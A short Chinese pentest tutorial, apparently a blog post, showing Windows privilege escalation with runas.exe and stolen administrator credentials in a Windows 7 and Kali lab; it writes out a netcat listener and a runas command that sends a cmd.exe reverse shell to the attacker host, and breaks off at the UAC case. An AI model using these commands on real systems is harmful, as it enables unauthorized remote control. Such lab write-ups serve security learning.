如果您以低权限用户的身份运行,并且拥有管理员凭证(用户名和密码),那么您可以使用这些凭证升级您的权限。最实际的方法是首先复制反向shell(例如,netcat或使用MSFvenom生成的shell)。之后,通过使用runas.exe可执行文件连接到Kali主机上的另一个监听shell,以另一个用户的身份运行netcat
这个就是runas
输入管理员密码之后 这个程序将使用管理员身份运行
1. 环境具备的条件
环境具备的条件
1. 以一个低权限的用户运行
2. 获得了管理员的凭证
3. 需要把用户账户控制功能 UAC关闭
如果启用了UAC,则runas.exe将以标准用户而非管理员身份登录%user%
以runas进行权限的提升
有点类似于Linux中的sudo这个工具
当前环境:
Windows7靶机 管理员为xiao netcat已经安装(nc64.exe)
Kali攻击机
2. 利用方法:
2.1 Kali端建立侦听
nc -lnvvp 443
2.2 使用runas运行以下命令:
runas.exe /env /noprofile /user:xiao "nc64.exe -nv 192.168.192.128 443 -e cmd.exe"
Kali拿到了shell
如果没有关闭UAC
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
